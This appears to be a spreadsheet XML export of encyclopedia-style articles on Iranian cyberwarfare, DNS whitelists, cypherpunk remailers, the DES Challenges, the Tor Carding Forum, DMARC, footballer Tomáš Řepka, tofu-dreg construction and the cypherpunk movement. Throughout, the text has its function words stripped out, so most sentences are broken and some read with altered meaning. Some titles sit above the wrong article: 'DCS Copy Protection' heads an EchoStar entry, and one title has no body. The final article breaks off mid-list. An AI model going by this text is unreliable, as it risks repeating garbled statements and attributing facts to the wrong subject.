infrastructure. march 2015: there massive power outage hours provinces turkey, holding million people. istanbul ankara among places suffering blackout. according observer.com, iranian hackers, possibly iranian cyber army, behind power outage. june 2017: daily telegraph reported intelligence officials concluded iran responsible cyberattack british parliament lasting hours compromised around email accounts mps. motive attack unknown experts suggested islamic revolutionary guard corps could using cyberwarfare undermine iran nuclear deal. january 2022: website israel's jerusalem post newspaper twitter account maariv newspaper hacked suspected iranian hackers. website's content replaced threat target shimon peres negev nuclear research center, apparent reference qasem soleimani assassinated exactly years earlier baghdad, iraq. march 2022: large-scale cyberattacks launched multiple israeli government websites, allegedly iran retaliation failed mossad operations, though neither attack attribution purported mossad operations could confirmed march 2022. national cyber directorate declared state emergency result attacks unnamed defense sources told media outlets possibly largest-ever cyberattack israel. suspended iranian accounts 2020, reuters reported, quoting monthly facebook report, iranian state-run media targeted hundreds fake social media accounts covertly spread pro-iranian messaging, online since least 2011, secretly broadcasting online promotional messages favor iran order targeting voters countries including britain united states. accounts suspended coordinated inauthentic behavior, removed eight networks recent weeks, including links islamic republic iran broadcasting. also ashiyane list cyber warfare forces iranian cyber army iran cyber police communications iran monica witt hybrid warfare iran iran mission centeralleged operations malware iranoperation olympic games stuxnet flame duqu stars virusalleged operations malware iranforeign interference 2020 united states elections mahdi shamoon operation ababil operation newscaster operation cleaver yemen cyber army syrian electronic army references external links iranians charged hacking financial sector (fbi)</t>
  </si>
  <si>
    <t>Cyberwarfare in Iran</t>
  </si>
  <si>
    <t>DNSWL</t>
  </si>
  <si>
    <t>dnswl ("dns-based whitelist") "whitelist" semi-trusted locations internet. locations consist addresses reputed occurrences spamming. generic need whitelisting natural language understanding mature field. common computer processes used spam filtering apply heuristics avoid presenting many useless messages email recipients. this severe impact reducing smtp reliability creating false positives; i.e., silently dropping legitimate messages. whitelists tackle task vouching sender, implies identifying accountable party sender belongs whitelisting also applied traffic incident response network forensics, since helps analyst tell malicious domains apart "normal" surfing. however, recommended actively block traffic whitelist, since would cause even legit surfing blocked. ipv6, blacklisting realistic option, greatly increased addresses. whitelisting used reduce huge address space manageable size: first build global whitelist ipv6 registered senders, second blacklist within that. accepting authentic sender registration request, least possible eliminate spambots. also automated whitelist vouch reference dnsbl black list notes references</t>
  </si>
  <si>
    <t>Cypherpunk anonymous remailer</t>
  </si>
  <si>
    <t>cypherpunk anonymous remailer type anonymous remailer takes messages encrypted gpg, cases plain text, forwards removing identifying information header. sending cypherpunk message step retrieving remailer's public key. generally cypherpunk remailer's public sending email message subject "remailer-key" server wish use.step import remailer's public keys gpg. step compose message compose message favorite text editor, using following template::: anon-to: &lt;recipient email address&gt; subject: &lt;subject&gt; &lt;message text&gt; step encrypt message and/or encrypt message composed using remailer's public key.step send encrypted message remailer prepare email send cypherpunk remailer using following template::: encrypted: -----begin message----- &lt;place encrypted output here&gt; -----end message----- then send also anonymity anonymous anonymous remailer mixmaster anonymous remailer (type mixminion (type iii) onion routing (network) pseudonymous remailer (a.k.a. servers) penet remailer data privacy traffic analysis howtos examples about.com: send email anonymously chaining remailers feraga.com: howto type anonymous remailer (link active 2010, archive version) notes extra headers called 'pseudoheaders' appear headers specification email. messages cypherpunk remailers layered route several different cypherpunk remailers decrease odds anyone determining sender some cypherpunk remailers also mixmaster anonymous remailers split long cypherpunk messages mixmaster packets send next remailer, also understands mixmaster. many cypherpunk remailer users repeat steps wrap message additional layers route several remailers additional privacy security. further reading email security, bruce schneier (isbn 0-471-05318-x) computer privacy handbook, andre bacard (isbn 1-56609-171-3)</t>
  </si>
  <si>
    <t>DCS Copy Protection</t>
  </si>
  <si>
    <t>echostar corporation american company, worldwide provider satellite communication internet services hughes network systems echostar satellite services business segments. echostar based unincorporated arapahoe county, colorado. prior 2008, operated dish network service brand, spun dish january 2008. history echostar originally formed 1980 chairman charles ergen distributor band systems. 1987, applied direct broadcast satellite (dbs) license federal communications commission granted access orbital slot 119° west longitude 1992. december 1995, firm successfully launched first satellite, echostar march 1996, established dish network brand name market home satellite system.on january 2008, dish network business demerged technology infrastructure side business. split shares created companies; former echostar communications corporation changed name dish network corporation consisted mainly dish network business, echostar corporation, retained ownership technology side including satellites, sling media, set-top development arm. dish network completed distribution echostar digital set-top business, certain infrastructure, assets related liabilities, including certain satellites, uplink satellite transmission assets, real estate (the "spin-off"). since spin-off, echostar dish network operated separate publicly traded companies. addition, substantial majority voting power shares dish network echostar owned beneficially charles ergen, chairman, certain trusts established ergen benefit family. february 2011, echostar announced would acquire hughes communications deal valued us$1.3 billion.on january 2017, echostar announced reached agreement dish transfer echostar technologies businesses, designed, developed distributed digital set-top boxes, provided satellite uplinking broadcast services developed supported streaming video technology back dish. transaction completed january 2017, substantially returning dish pre-2008 status set-top-box hardware manufacturer. march 2017, delays caused weather worries, spacex delivered echostar xxiii orbit. satellite launched falcon rocket provides broadcast services brazil. because echostar xxiii heavy satellite, mission include rocket landing post-takeoff, would require much fuel. this first time purely commercial satellite launched served base apollo moon trips space shuttle flights.on 2019, echostar announced reached agreement dish network corporation transfer portion business managed provided broadcast satellite services, referred (broadcast satellite services) business, dish order concentrate broadband services initiatives. transaction completed september 2019. satellite fleet orbital locations changesince echostar frequently moves satellites among many orbiting slots list immediately accurate. refer lyngsat.com detailed satellite information. references</t>
  </si>
  <si>
    <t>DES Challenges</t>
  </si>
  <si>
    <t>challenges series brute force attack contests created security highlight lack security provided data encryption standard. contests first challenge began 1997 solved days deschall project.des challenge ii-1 solved distributed.net days early 1998. plaintext message solved "the secret message many hands make light work."des challenge ii-2 solved hours july 1998, electronic frontier foundation (eff), purpose-built deep crack machine. $10,000 success, although machine cost $250,000 build. contest demonstrated quickly rich corporation government agency, built similar machine, could decrypt ciphertext encrypted des. text revealed "the secret message it's time 128-, 192-, 256-bit keys."des challenge joint effort distributed.net deep crack. found hours minutes january 1999, plaintext "see rome (second conference, march 22-23, 1999)". reaction after shown breakable, director louis freeh told congress, "that going make difference kidnapping case. going make difference national security case. technology brute force capability information."it special purpose hardware brought time hours industry federal authorities admit longer viable. although national institute standards technology started work became advanced encryption standard 1997, continued endorse late october 1999, fips 46-3. however, triple preferred. also factoring challenge secret-key challenge references</t>
  </si>
  <si>
    <t>DICING</t>
  </si>
  <si>
    <t>cryptography, dicing stream cypher algorithm developed an-ping. submitted estream project ecrypt network.</t>
  </si>
  <si>
    <t>Tor Carding Forum</t>
  </si>
  <si>
    <t>carding forum (tcf) tor-based forum specializing trade stolen credit card details, identity theft currency counterfeiting. site founded individual known 'verto' also founded defunct evolution darknet market.the site required registration.a 2013 investigation counterfeit banknotes pittsburgh source ugandan fakes identified purchased carding forums. december 2014 ryan andrew gustafson a.k.a. "jack farrel" "willy clock", citizen living uganda arrested large scale sale counterfeit united states currency u.s. secret service sold carding forums well crime forums.in december 2014 site closed following hack, directing users evolution's forums.in june 2015 dark researcher identified clearnet address similar hidden service branded 'the carding forum subsequently shut down. references</t>
  </si>
  <si>
    <t>DISNOVATION.ORG</t>
  </si>
  <si>
    <t>disnovation.org (sometimes referred disnovation.org working group) contemporary maria roszkowska nicolas maigret based paris, france, develops installations, publications events technology politics.their work presented centre pompidou, transmediale, museum design science gallery, dublin. selected works pirate cinema pirate cinema (2012-2014) video installation uses computer constantly downloads viewed torrents tracker website, intercepts currently downloading video/audio snippets, projects screen information origin destination, discards repeats process next stream download que. predictive predictive (2015-2017) algorithm predicting artistic concepts. publications pirate book (2015) compilation stories sharing, distributing experiencing cultural contents outside boundaries local economies, politics, laws. notes</t>
  </si>
  <si>
    <t>DMARC</t>
  </si>
  <si>
    <t>dmarc (domain-based message authentication, reporting conformance) email authentication protocol. designed give email domain owners ability protect domain unauthorized use, commonly known email spoofing. purpose primary outcome implementing dmarc protect domain used business email compromise attacks, phishing email, email scams cyber threat activities. once dmarc entry published, receiving email server authenticate incoming email based instructions published domain owner within entry. email passes authentication, delivered trusted. email fails check, depending instructions held within dmarc record email could delivered, quarantined rejected. example, email forwarding service delivers mail, "from: no-reply@&lt;forwarding service&gt;".dmarc extends existing email authentication mechanisms, sender policy framework (spf) domainkeys identified mail (dkim). allows administrative owner domain publish policy records specify mechanism (dkim, both) employed sending email domain; check from: field presented users; receiver deal failures reporting mechanism actions performed policies. dmarc defined internet engineering task force's published document 7489, dated march 2015, "informational".there parameters used dmarc record like alignment mode, rua/ruf ensure dmarc reports daily recipient mail servers. overview dmarc policy allows sender's domain indicate email messages protected and/or dkim, tells receiver neither authentication methods passes reject message quarantine policy also specify email receiver report back sender's domain messages pass and/or fail.these policies published public domain name system (dns) text records. dmarc directly address whether email spam otherwise fraudulent. instead, dmarc require message pass dkim validation, also pass alignment. under dmarc message fail even passes dkim, fails alignment.setting dmarc improve deliverability messages legitimate senders. alignment dmarc operates checking domain message's from: field (also called "rfc5322.from") "aligned" authenticated domain names. either dkim alignment checks pass, dmarc alignment test passes. alignment specified strict relaxed. strict alignment, domain names must identical. relaxed alignment, top-level "organizational domain" must match. organizational domain found checking list public suffixes, adding next label. example, "a.b.c.d.example.com.au" "example.com.au" organizational domain, registrar offers names ".com.au" customers. although time dmarc spec ietf working group domain boundaries, nowadays organizational domain derived public suffix list.like dkim, dmarc uses concept domain owner, entity entities authorized make changes given domain. checks address sending server authorized owner domain appears smtp mail from command. (the email address mail from also called bounce address, envelope-from rfc5321.mailfrom.) addition requiring check passes, dmarc checks rfc5321.mailfrom aligns 5322.from.dkim allows parts email message cryptographically signed, signature must cover from field. within dkim-signature mail header, (domain) (selector) tags specify retrieve public signature. valid signature proves signer domain owner, from field modified since signature applied. there several dkim signatures email message; dmarc requires valid signature domain aligns sender's domain stated from: header field. record dmarc records published subdomain label _dmarc, example _dmarc.example.com. compare example.com, dkim selector._domainkey.example.com. content resource record consists name=value tags, separated semicolons, similar dkim. example: "v=dmarc1;p=none;sp=quarantine;pct=100;rua=mailto:dmarcreports@example.com;" here, version, policy (see below), subdomain policy, percent "bad" email apply policy, send aggregate reports example, entity controlling example.com domain intends monitor and/or dkim failure rates expect email sent subdomains example.com. note subdomain publish dmarc record; receivers must check falling back organizational domain record. step step adoption protocol provides various ratchets, transitional states, allow mail admins gradually transition implementing dmarc unyielding setup. concept stepwise adoption assumes goal dmarc strongest setting, case domains. regardless intent, mechanisms allow greater flexibility. policy first foremost, three policies: none entry level policy. special treatment required receivers, enables domain receive feedback reports. quarantine asks receivers treat messages fail dmarc check suspicion. different receivers different means implement that, example flag messages deliver spam folder. reject asks receivers outright reject messages fail dmarc check.the policy published mitigated applying percentage messages fail dmarc check. receivers asked select given percentage messages simple bernoulli sampling algorithm. rest messages undergo lower policy; none p=quarantine, quarantine p=reject. specified, defaults 100% messages. case p=quarantine; pct=0; used force mailing list managers rewrite from: field, p=none.finally, subdomain policy, newly added no-domain policy allow tweak policy specific subdomains. reports dmarc capable producing separate types reports. aggregate reports sent address specified following rua. forensic reports emailed address following tag. these mail addresses must specified mailto format (e.g. mailto:worker@example.net multiple reporting addresses valid must full format, separated comma. target email addresses belong external domains. case, target domain dmarc record agrees receive them, otherwise would possible exploit reporting spam amplification. example, receiver.example receives mail message from: someone@sender.example wishes report finds ruf=mailto:some-id@thirdparty.example, looks confirming record namespace administered target, like this: sender.example._report._dmarc.thirdparty.example "v=dmarc1;" aggregate reports aggregate reports sent files, typically day. subject mentions "report domain", indicates domain name report generated, "submitter", entity issuing report. payload attachment long filename consisting bang-separated elements report-issuing receiver, begin epochs reported period unix-style time stamps, optional unique identifier extension depends possible compression (used .zip).for example: example.com!example.org!1475712000!1475798400.xml.gz. content consists header, containing policy report based report metadata, followed number records. records database relation viewed tabular form. schema defined appendix specifications record exemplified dmarc.org. here stick relational example, better conveys nature data. dmarc records also directly transformed html applying stylesheet. rows grouped source authentication results, passing count group. leftmost result columns, labelled dkim show dmarc-wise results, either pass fail, taking alignment account. rightmost ones, similar labels, show name domain claims participate sending message parentheses) authentication status claim according original protocol, dkim, regardless identifier alignment. right side, appear twice, return-path: test helo test; dkim appear signature present message. example, first represents main mail flow example.org, second dkim glitch, signature breakage minor alteration transit. third fourth rows show typical failures modes forwarder mailing list, respectively. dmarc authentication failed last only; could affected message disposition example.org specified strict policy. disposition reflects policy published actually applied messages, none, quarantine, reject. along shown table, dmarc provides policy override. some reasons receiver apply policy different requested already provided specification: forwarded keeping bounce address, usually break dkim, sampled sender choose apply policy percentage messages only, trusted forwarder message arrived locally known source mailing list receiver heuristically determined message arrived mailing list, local policy receivers obviously free apply policy like, cool senders know, none applies, comment field allows more. forensic reports forensic reports, also known failure reports, generated real time consist redacted copies individual messages failed spf, dkim based upon value specified tag. their format, extension abuse reporting format, resembles regular bounces contain either "message/rfc822" "text/rfc822-headers". forensic reports also contain following: source sending address from email address recipient email address email subject line dkim authentication results received time email message headers include sending host, email message dkim signature, custom header information. compatibility forwarders there several different types email forwarding, break spf. mailing lists mailing lists frequent cause legitimate breakage original author's domain dkim signature, example adding prefix subject header. number workarounds possible, mailing list software packages working solutions. turn message modifications this workaround keeps standard mailing list workflow, adopted several large mailing list operators, precludes list adding footers subject prefixes. this requires careful configuration mailing software make sure signed headers reordered modified. misconfigured email server list-id dkim messages sent mailing list, list operator forced reject from: rewriting. from: rewriting popular least intrusive workarounds consists rewriting from: header field. original author's address added reply-to: field. rewriting range appending .invalid domain name, allocating temporary user opaque used, keeps user's "real" email address private list. addition, display name changed show author list list operator). those examples would result, respectively, following: last line, reply-to:, designed order accommodate reply-to-author functionality, case reply-to-list functionality covered preceding change from: header field. that way, original meaning fields reversed. altering author fair general, break expected relationship meaning appearance datum. also breaks automated there communities mailing lists coordinate work, deploy tools from: field attribute authorship attachments. other workarounds wrapping message works nicely, email client understands wrapped messages. change perhaps obvious solution, except seem legally required countries, routinely losing authentication render overall authentication fragile. sender field making changes from: header field pass dkim alignment bring message compliance 5322 section 3.6.2: "the 'from:' field specifies author(s) message, mailbox(es) person(s) system(s) responsible writing message." mailbox refers author's email address. sender: header available indicate email sent behalf another party, dmarc checks policy from domain ignores sender domain.both adsp dmarc reject using sender field non-technical basis many user agents display recipient. history draft dmarc specification maintained since january 2012.in october 2013, mailman 2.1.16 released options handle posters domain dmarc policy p=reject. change tried anticipate interoperability issues expected case restrictive policies applied domains human users opposed purely transactional mail domains). april 2014, yahoo changed dmarc policy p=reject, thereby causing misbehavior several mailing lists. days later, also changed dmarc policy p=reject. those moves resulted significant amount disruption, mailbox providers accused forcing costs security failures onto third parties. 2020, official dmarc wiki contains several suggestions mailing lists handle messages domain strict dmarc policy, widely implemented mailing list changing “from” header address domain. ietf working group formed august 2014 order address dmarc issues, starting interoperability concerns possibly continuing revised standard specification documentation. meanwhile, existing dmarc specification reached editorial state agreed upon implemented many. published march 2015 independent submission stream "informational" (non-standard) category 7489.in march 2017, federal trade commission published study dmarc usage businesses. businesses, study found third implemented dmarc configuration, fewer used dmarc instruct servers reject unauthenticated messages, majority implemented spf. contributors contributors dmarc specification include: receivers: aol, comcast, google (gmail), mail.ru, microsoft (outlook.com, hotmail), netease (163.com, 126.com, 188.com, yeah.net), xs4all, yahoo, yandex senders: american greetings, bank america, facebook, fidelity investments, jpmorganchase, linkedin, paypal, twitter intermediaries vendors: agari (founder/ceo patrick peterson), cloudmark, dmarc advisor, sift, returnpath, trusted domain project also authenticated received chain (arc) author domain signing practices domainkeys identified mail (dkim) e-mail authentication certified email mail servers dmarc sender policy framework (spf) notes references external links official website anti spam research group wiki: mitigating dmarc damage third party mail</t>
  </si>
  <si>
    <t>Tomáš Řepka</t>
  </si>
  <si>
    <t>tomáš řepka (born january 1974) czech former professional footballer played defender baník ostrava, sparta prague, fiorentina, west united české budějovice, czech national team. currently, řepka playing amateur football sokol červené janovice. club career řepka began career baník ostrava, played 1990 1995. joined sparta prague, spent almost three years, moving italian serie club fiorentina. joined premier league club west united early glenn roeder's tenure manager, club record £5.5 million september 2001.řepka sent west debut bookable offences, missed match suspension, sent third match played club. went form central defensive partnership christian dailly club's relegation second-tier championship, although gained reputation disciplinary record, received yellow cards first season. after relegation 2002–03 season, appointment alan pardew manager řepka move right-back. summer 2005, club regained premier league status, re-signed pardew two-year contract, albeit reduced terms, left club january 2006 return czech republic family. played final match west january fulham.in 2006, řepka returned sparta prague. 2009, personality league award czech footballer year awards.in december 2011, řepka left sparta prague following mutually agreed early termination contract.after termination contract sparta prague, signed dynamo české budějovice, becoming stable member first team helped team avoid relegation 2011–12 season. however, contract terminated team november 2012. after negotiations příbram broken down, accepted non-player role baník most. after three months, řepka quit manager role disagreements club leaders.in summer 2018, řepka returned football, joining czech amateur club panthers čelákovice. řepka captained side debut, attracting spectators side's loss záluží. march 2019, řepka joined hostivař. august 2020, řepka signed sokol červené janovice. january 2021, řepka's son, tomasso, joined červené janovice. international career after making international debut czechoslovakia june 1993 faroe islands, řepka played times czech republic 1994 2001. missed uefa euro 1996 two-match suspension card. however, played country euro 2000, czech republic eliminated group stage. disciplinary problems řepka notorious lack self-control, aggression disciplinary problems. during professional career, received twenty cards (see table below). scandal included attacking game officials cameraman september 2007. personal life řepka married years renáta řepková, daughter veronika tomasso. 2012, divorced. december 2011, became engaged model vlaďka erbová. their markus born 2012. pair married july 2013, divorced 2016. august 2018, řepka received six-month jail sentence advertising sexual services internet name ex-wife. sentence later reduced community order. february 2019, řepka sentenced months jail fraud, pending appeal, prague court heard sold luxury rental own. weeks later, řepka sentenced nine months jail previous suspended sentences driving influence converted jail terms convictions. honours club sparta prague czech first league: 1996–97, 1997–98, 2006–07, 2009–10 czech cup: 1995–96, 2006–07, 2007–08fiorentina coppa italia: 2000–01west united football league championship play-offs: 2005 international czech republic kirin cup: 1998 individual czech first league personality year 2008–09 chosen member stars team sparta prague years 1980–2010 fans poll seventh-best czech footballer decade (2000–10) fans poll czech first league second-best defender years 1993–2013 fans poll references external links tomáš řepka fačr czech) official page czech) tomáš řepka soccerbase tomáš řepka. wild man.(in russian) tomáš řepka footballdatabase.eu tomáš řepka official sparta prague website</t>
  </si>
  <si>
    <t>DNS Certification Authority Authorization</t>
  </si>
  <si>
    <t>Tofu-dreg project</t>
  </si>
  <si>
    <t>"tofu-dreg project" (chinese: 豆腐渣工程; pinyin: dòufuzhā gōngchéng) phrase used chinese-speaking world describe poorly constructed building. phrase coined rongji, former premier people's republic china, 1998 visit jiujiang city, jiangxi province describe poorly-built flood dykes yangtze river. phrase notably used referring buildings collapsed 2008 sichuan earthquake disaster.in china, term tofu dregs (the pieces left making tofu) widely used metaphor shoddy work, hence implication "tofu-dreg project" poorly executed project.the prevalence “tofu projects” rampant corruption graft china, "project money skimmed officials, leaving less funding quality materials, qualified staff, acceptable workmanship" "projects often granted companies political ties qualifications". furthermore "tribute projects" often rushed completion order mark state anniversary. instance 2007, bridge hunan province, work expedited could open 50th anniversary founding local prefecture, collapsed construction, killing people. lastly, local governments rely revenues arising construction including land sales transfer fees, incentives promote rapid unfettered growth, including turning blind substandard construction. after visiting china early 2011, canadian journalist lawrence solomon stated many chinese people "fear 'tofu dam' might fail, leading hundreds thousands downstream victims."according chinese architect tofu-dreg projects china vastly outnumbered buildings without construction flaws. said cases, ill-constructed buildings collapse merely reduced lifespan leakages. instance 2020 shanghai tower suffered major water leaks 60th floors damaged large quantity office equipment electronics, leading criticism chinese social media users tofu-dreg project. 2008 wenchuan earthquake during 2008 wenchuan earthquake, many schoolhouses fell down, many students died. these buildings used exemplify tofu-dreg projects. collapses linked allegations corruption construction chinese schools. …school construction worst. first, there’s enough capital. schools poor areas small budgets and, unlike schools cities, can’t collect huge fees, they’re pressed money. with construction, exploitation government officials, education officials, school managers, etc. imagine what’s left actual building schools. when earthquake prevention standards raised, government departments, major businesses, etc. appraise reinforce buildings. schools 70s-era buildings, pays attention them. because this, older school buildings suffer[ing] inadequate protection buildings shoddily constructed. 2008, geoffery york globeandmail.com reported shoddily constructed buildings commonly called "tofu buildings" builders corners replacing steel rods thin iron wires concrete re-inforcement; using inferior grade cement, all; using fewer bricks should. local quoted article saying "the supervising agencies check national standards."the state-controlled media largely ignored tofu-dregs schoolhouses, directives propaganda bureau's instructions. parents, volunteers, journalists questioned authorities detained threatened. order silence issue, riot police officers broke protests parents; authorities cordons around schools; officials ordered chinese news media stop reporting school collapses. references</t>
  </si>
  <si>
    <t>Cypherpunk</t>
  </si>
  <si>
    <t>cypherpunk individual advocating widespread strong cryptography privacy-enhancing technologies route social political change. originally communicating cypherpunks electronic mailing list, informal groups aimed achieve privacy security proactive cryptography. cypherpunks engaged active movement since least late 1980s. history before mailing list until 1970s, cryptography mainly practiced secret military agencies. however, changed publications brought public awareness: government publication data encryption standard (des), block cipher became widely used; first publicly available work public-key cryptography, whitfield diffie martin hellman.the technical roots cypherpunk ideas traced back work cryptographer david chaum topics anonymous digital cash pseudonymous reputation systems, described paper "security without identification: transaction systems make brother obsolete" (1985).in late 1980s, ideas coalesced something like movement. etymology cypherpunks mailing list late 1992, eric hughes, timothy john gilmore founded small group monthly gilmore's company cygnus solutions francisco area, humorously termed cypherpunks jude milhon first meetings derived cipher cyberpunk. november 2006, word added oxford english dictionary.the cypherpunks mailing list started 1992, 1994 subscribers. peak, active forum technical discussion ranging mathematics, cryptography, computer science, political philosophical discussion, personal arguments attacks, etc., spam thrown email john gilmore reports average messages december 1996 march 1999, suggests number probably higher earlier. number subscribers estimated reached 2000 year 1997.in early 1997, choate igor chudov cypherpunks distributed remailer, network independent mailing list nodes intended eliminate single point failure inherent centralized list architecture. peak, cypherpunks distributed remailer included least seven nodes. mid-2005, al-qaeda.net remaining node. 2013, following brief outage, al-qaeda.net node's list software changed majordomo mailman subsequently node renamed cpunks.org. architecture defunct, though list administrator stated 2013 exploring integrate functionality mailing list software.for time, cypherpunks mailing list popular tool mailbombers, would subscribe victim mailing list order cause deluge messages sent her. (this usually done prank, contrast style terrorist referred mailbomber.) this precipitated mailing list sysop(s) institute reply-to-subscribe system. approximately hundred messages typical mailing list, divided personal arguments attacks, political discussion, technical discussion, early spam.the cypherpunks mailing list extensive discussions public policy issues related cryptography politics philosophy concepts anonymity, pseudonyms, reputation, privacy. these discussions continue remaining node elsewhere list become increasingly moribund. events gurps cyberpunk raid lent weight idea private individuals needed take steps protect privacy. heyday, list discussed public policy issues related cryptography, well practical nuts-and-bolts mathematical, computational, technological, cryptographic matters. list range viewpoints probably completely unanimous agreement anything. general attitude, though, definitely personal privacy personal liberty considerations. early discussion online privacy list discussing questions privacy, government monitoring, corporate control information, related issues early 1990s become major topics broader discussion least years later. some list participants highly radical issues. those wishing understand context list might refer history cryptography; early 1990s, government considered cryptography software munition export purposes. (pgp source code published paper book bypass regulations demonstrate futility.) 1992, deal allowed export cryptography based 40-bit considered relatively weak (and especially created, many contests break it). government also tried subvert cryptography schemes skipjack escrow. also widely known communications logged government agencies (which would later revealed at&amp;t scandals) though taken obvious axiom list members.the original cypherpunk mailing list, first list spin-off, coderpunks, originally hosted john gilmore's toad.com, falling sysop moderation, list migrated several cross-linked mail-servers called "distributed mailing list." coderpunks list, open invitation only, existed time. coderpunks took technical matters less discussion public policy implications. there several lists today trace lineage directly original cypherpunks list: cryptography list (cryptography@metzdowd.com), financial cryptography list (fc-announce@ifca.ai), small group closed (invitation-only) lists well. toad.com continued existing subscriber list, unsubscribe, mirrored distributed mailing list, messages distributed list appear toad.com. list faded popularity, fade number cross-linked subscription nodes. extent, cryptography list acts successor cypherpunks; many people continues discussions. however, moderated list, considerably less zany somewhat technical. number current systems trace mailing list, including pretty good privacy, /dev/random linux kernel (the actual code completely reimplemented several times since then) today's anonymous remailers. main principles basic ideas found cypherpunk's manifesto (eric hughes, 1993): "privacy necessary open society electronic age. cannot expect governments, corporations, large, faceless organizations grant privacy must defend privacy expect any. cypherpunks write code. know someone write software defend privacy, we're going write it."some quite senior people major hi-tech companies others well-known researchers (see list affiliations below). first mass media discussion cypherpunks 1993 wired article steven levy titled crypto rebels: people room hope world individual's informational footprints everything opinion abortion medical record actual abortion traced individual involved chooses reveal them; world coherent messages shoot around globe network microwave, intruders feds trying pluck vapor find gibberish; world tools prying transformed instruments privacy. there vision materialize, widespread cryptography. technologically possible? definitely. obstacles political powerful forces government devoted control tools. short, going would liberate crypto would suppress seemingly innocuous bunch strewn around conference room represents vanguard pro-crypto forces. though battleground seems remote, stakes not: outcome struggle determine amount freedom society grant 21st century. cypherpunks, freedom issue worth risk. three masked cover edition wired prominent cypherpunks may, eric hughes john gilmore. later, levy wrote book, crypto: code rebels beat government saving privacy digital age, covering crypto wars 1990s detail. "code rebels" title almost synonymous cypherpunks. term cypherpunk mildly ambiguous. contexts means anyone advocating cryptography tool social change, social impact expression. however, also used mean participant cypherpunks electronic mailing list described below. meanings obviously overlap, means synonymous. documents exemplifying cypherpunk ideas include timothy may's crypto anarchist manifesto (1992) cyphernomicon (1994), cypherpunk's manifesto. privacy communications basic cypherpunk issue privacy communications data retention. john gilmore said wanted guarantee physics mathematics, laws give real privacy personal communications."such guarantees require strong cryptography, cypherpunks fundamentally opposed government policies attempting control usage export cryptography, remained issue throughout late 1990s. cypherpunk manifesto stated "cypherpunks deplore regulations cryptography, encryption fundamentally private act."this central issue many cypherpunks. most passionately opposed various government attempts limit cryptography export laws, promotion limited length ciphers, especially escrowed encryption. anonymity pseudonyms questions anonymity, pseudonymity reputation also extensively discussed. arguably, possibility anonymous speech publication vital open society genuine freedom speech position cypherpunks. that federalist papers originally published pseudonym commonly-cited example. privacy self-revelation whole issues around privacy scope self-revelation perennial topics list. consider young person gets "carded" enters produces driver's license proof age. license includes things like full name home address; completely irrelevant question legal drinking. however, could useful lecherous member staff wants stalk young customer, thief cleans apartment accomplice tells look well home. government passes drinking morally obligated create privacy-protecting form shows legally drink without revealing anything else you? absence that, ethical acquire bogus driver's license protect privacy? cypherpunks, answer questions "yes, obviously!" what traffic asks driver's license vehicle registration? should restrictions learns you? company issues frequent flier reward card, requires registration site? cards toll roads potentially allow police others track movements? cameras record license plates faces street? phone company internet records? general, manage privacy electronic age? cypherpunks naturally consider suggestions various forms national uniform identification card dangerous; risks abuse outweigh benefits. censorship monitoring general, cypherpunks opposed censorship monitoring government police. particular, government's clipper chip scheme escrowed encryption telephone conversations (encryption supposedly secure attackers, breakable government) seen anathema many list. this issue provoked strong opposition brought many recruits cypherpunk ranks. list participant matt blaze found serious flaw scheme, helping hasten demise. steven schear first suggested warrant canary 2002 thwart secrecy provisions court orders national security letters. 2013, warrant canaries gaining commercial acceptance. hiding hiding important discussions concerns cryptography presence oppressive authorities. result, cypherpunks discussed improved steganographic methods hide crypto itself, allow interrogators believe forcibly extracted hidden information subject. instance, rubberhose tool partitioned intermixed secret data drive fake secret data, accessed different password. interrogators, extracted password, believe indeed unlocked desired secrets, whereas reality actual data still hidden. words, even presence hidden. likewise, cypherpunks also discussed conditions encryption used without noticed network monitoring systems installed oppressive regimes. activities manifesto says, "cypherpunks write code"; notion good ideas need implemented, discussed, much part culture mailing list. john gilmore, whose site hosted original cypherpunks mailing list, wrote: literally race ability build deploy technology, ability build deploy laws treaties. neither side likely back wise definitively lost race." software projects anonymous remailers mixmaster remailer almost entirely cypherpunk development. among projects involved email privacy, frees/wan opportunistic encryption whole net, off-the-record messaging privacy internet chat, project anonymous surfing. hardware 1998, electronic frontier foundation, assistance mailing list, built $200,000 machine could brute-force data encryption standard days. project demonstrated was, without question, insecure obsolete, sharp contrast government's recommendation algorithm. expert panels cypherpunks also participated, along experts, several reports cryptographic matters. paper "minimal lengths symmetric ciphers provide adequate commercial security". suggested bits minimum size allow existing cipher considered secure kept service. time, data encryption standard 56-bit keys still government standard, mandatory applications. other papers critical analysis government schemes. "the risks recovery, escrow, trusted third-party encryption", evaluated escrowed encryption proposals. comments carnivore system technical review. looked scheme monitoring email. cypherpunks provided significant input 1996 national research council report encryption policy, cryptography's role securing information society (crisis). this report, commissioned u.s. congress 1993, developed extensive hearings across nation interested stakeholders, committee talented people. recommended gradual relaxation existing u.s. government restrictions encryption. like many study reports, conclusions largely ignored policy-makers. later events final rulings cypherpunks lawsuits forced complete relaxation unconstitutional controls encryption software. lawsuits cypherpunks filed number lawsuits, mostly suits government alleging government action unconstitutional. phil karn sued state department 1994 cryptography export controls ruled that, book applied cryptography could legally exported, floppy disk containing verbatim copy code printed book legally munition required export permit, refused grant. karn also appeared house senate committees looking cryptography issues. daniel bernstein, supported eff, also sued export restrictions, arguing preventing publication cryptographic source code unconstitutional restriction freedom speech. won, effectively overturning export law. bernstein united states details. peter junger also sued similar grounds, won. civil disobedience cypherpunks encouraged civil disobedience, particular export cryptography. until 1997, cryptographic code legally munition fall itar, length restrictions removed 2000. 1995 adam back wrote version algorithm public-key cryptography three lines perl suggested people email signature file: vince cate page invited anyone become international arms trafficker; every time someone clicked form, export-restricted item originally pgp, later copy back's program would mailed server anguilla. cypherpunk fiction neal stephenson's novel cryptonomicon many characters "secret admirers" mailing list. this fairly obviously based cypherpunks list, several well-known cypherpunks mentioned acknowledgements. much plot revolves around cypherpunk ideas; leading characters building data allow anonymous financial transactions, book full cryptography. but, according author book's title spite similarity based cyphernomicon, online cypherpunk document. legacy cypherpunk achievements would later also used canadian e-wallet, mintchip, creation bitcoin. inspiration cryptoparty decades later extent cypherpunk manifesto quoted header wiki, eric hughes delivered keynote address amsterdam cryptoparty august 2012. notable cypherpunks cypherpunks list participants included many notable computer industry figures. most list regulars, although would call "cypherpunks". following list noteworthy cypherpunks achievements: marc andreessen: co-founder netscape invented jacob appelbaum: former project employee, political advocate julian assange: wikileaks founder, deniable cryptography inventor, journalist; co-author underground; author cypherpunks: freedom future internet; member international subversives. assange stated joined list late 1993 early 1994. archive cypherpunks mailing list posts mailing list archives. derek atkins: computer scientist, computer security expert, people factored rsa-129 adam back: inventor hashcash nntp-based eternity networks; co-founder blockstream bell: author "assassination politics" steven 